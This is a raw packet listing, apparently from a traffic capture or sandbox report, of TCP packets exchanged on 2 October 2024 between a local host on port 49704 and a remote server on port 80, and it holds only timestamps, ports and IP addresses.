Oct 2, 2024 23:10:14.805882931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.805902004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.805907011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.805912018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.805921078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.805929899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.805929899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.805939913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.805948973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.805953979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.805958986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.805967093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.805974007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.805977106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.805985928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.805991888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.805996895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806005955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806013107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.806015968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806025028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806039095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.806049109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.806586981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806597948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806606054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806615114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806622982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806631088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.806632996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806643009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806649923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.806653023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806660891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.806662083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806672096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806680918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806688070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.806700945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806710958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806713104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.806720018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806729078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806737900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806740046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.806746006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.806746960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.806780100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.807554960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807564974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807573080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807581902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807590961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807600975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807602882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.807624102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807624102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.807631016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.807635069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807643890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807652950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807657003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807662964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807662964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.807667971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807672024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807676077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.807723999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.808259010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808270931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808279991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808289051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808298111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808307886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808310032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.808315992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808325052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808329105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.808334112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808346033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.808351040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.808352947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808362961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808372021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808381081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808382034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.808389902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808401108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808403969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.808409929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808418989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808422089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.808428049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808439016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.808442116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.808461905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.808481932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.809206009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809216022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809226036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809233904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809243917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809253931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809257030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.809262991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809273005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809281111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.809282064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809289932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.809293032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809303999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809313059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809323072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.809330940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809340000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.809340000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809350014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809360027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809361935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.809370995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809381962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.809384108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.809408903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.809417009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.810251951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810261011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810275078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810286045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810295105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810302019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.810306072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810314894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810324907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.810324907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810334921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810343981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.810349941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.810350895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810360909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810369968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810379982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810380936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.810389042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810400963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.810422897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.810909986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810921907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810930014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810939074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810942888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.810947895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810959101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810961008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.810967922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810976982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.810985088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.810987949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.811000109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.811006069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.811016083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.811017036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.811024904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.811034918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.811038017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.811052084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.811057091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.811065912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.811074972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.811077118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.811088085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.811113119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.814363003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.814414024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.814424992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.814429045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.814455032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.814486980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.814501047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.814510107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.814519882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.814529896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.814555883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.814733982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.814745903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.814915895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.814980030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.814990044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.814999104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815009117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815017939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815027952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815027952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815038919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815047979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815051079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815057993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815067053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815068960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815077066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815083981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815087080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815097094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815104008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815107107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815469980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815480947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815489054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815498114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815506935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815506935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815506935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815507889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815517902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815524101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815529108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815537930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815541983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815547943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815565109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815581083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815601110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.815845013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815855026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.815887928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.816021919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816031933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816040039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816047907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816056967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816066027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816076040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816077948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.816086054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816096067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816096067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.816104889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816116095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816116095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.816124916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816127062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.816134930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816144943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.816145897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816168070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.816189051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.816683054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816694021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816737890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.816818953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816828966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816838980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816848040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816857100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816862106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.816867113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816876888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.816879988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.816900969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.816921949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817141056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817151070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817159891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817167997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817177057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817186117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817194939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817197084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817205906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817214966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817219019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817224979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817234993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817236900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817255020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817262888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817704916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817714930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817723036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817738056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817747116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817754984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817755938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817765951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817768097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817775011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817785025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817795038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817795038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817806005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817816019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817816973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817825079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817835093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817837000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.817852020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817859888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.817884922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.818198919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818209887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818217993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818226099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818234921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818242073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.818243980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818253994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818269014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818269968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.818279028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818288088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818289042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.818298101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818306923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818310022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.818315983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818325996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818329096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.818336010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818346024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818351030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.818356037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818365097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818367958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.818375111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818384886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.818386078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.818408012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.818429947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:14.819230080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.819241047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.819250107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.819256067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.819266081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:14.819271088 CEST	80	49704	185.215.113.37	192.168.2.5
